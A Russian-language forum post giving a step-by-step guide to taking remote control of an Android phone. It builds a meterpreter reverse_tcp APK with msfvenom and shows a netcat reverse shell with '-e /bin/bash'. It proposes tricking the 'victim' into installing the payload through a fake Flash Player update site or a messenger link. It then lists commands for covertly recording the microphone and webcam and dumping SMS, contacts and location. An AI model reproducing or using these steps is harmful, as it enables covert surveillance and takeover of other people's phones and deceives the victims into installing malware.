Как получить доступ к Android?

Главная Форумы Android Как получить доступ к Android?

В этой теме 0 ответов, 1 участник, последнее обновление  New-Mnemonic 1 месяц, 3 нед. назад.

Просмотр 1 сообщения - с 1 по 1 (всего 1)
  • Автор
    Сообщения
  • #9747

    New-Mnemonic
    Заблокирован

    В этой статье хочу рассказать об одном способе, который позволяет получить доступ до смартфона базе Android. Часть материала будет предоставлено в форме мануала с пошаговыми действиями, а часть – для философских раздумий и интерпретаций. Все зависит от ваших целей, знаний и подкованности жертвы и т.д. Если у вас нет доступа к конкретному смартфону, то нужно будет пофантазировать с социальной инженерией.

    Как получить доступ к Android?

    Принцип работы

    Простыми словами, сначала мы создадим приложение(payload), потом определенным образом доставим жертве, а в конце у нас будет сессия meterpreter. Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.

    Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:

    nc -l -p 8577

    Жертва в свою очередь подключается к этому открытому порту:

    nc 192.168.1.1 8577 -e /bin/bash

    Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы.

    Вот по такому принципу мы будет работать с android. Принцип работы с payload может быть намного сложнее, но в этом основная суть.

    Создание payload

    Открываем терминал и с помощью такого набора создаем приложение с расширением. apk, которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig:

    msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R >shell.apk

    После выполнения команды в корневой директории будет создан файл shell.apk.

    shell.apk

    Далее необходимо запустить msfconsole.

    msfconsole

    msfconsole

    После этого последовательно выполняем все команды:

    use exploit/multi/handler

    set payload android/meterpreter/reverse_tcp

    set LHOST ВашIP

    set LPORT 4444

    exploit

    После этого, жертва должна сказать и запустить наш shell.apk. Как это сделать – это философский вопрос. Можно отправить ссылку в мессенджер. Можно, как вариант сделать сайт с заглушкой под обновление флеш плера. Таким образом, пользователь зайдет и начнет скачивать обновление. После этого будет установлена сессия удаленного управления.

    Некоторые полезные команды:

    record_mic

    webcam_snap

    webcam_stream

    dump_contacts

    dump_sms

    geolocate

    После установления сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение.

Просмотр 1 сообщения - с 1 по 1 (всего 1)

Для ответа в этой теме необходимо авторизоваться.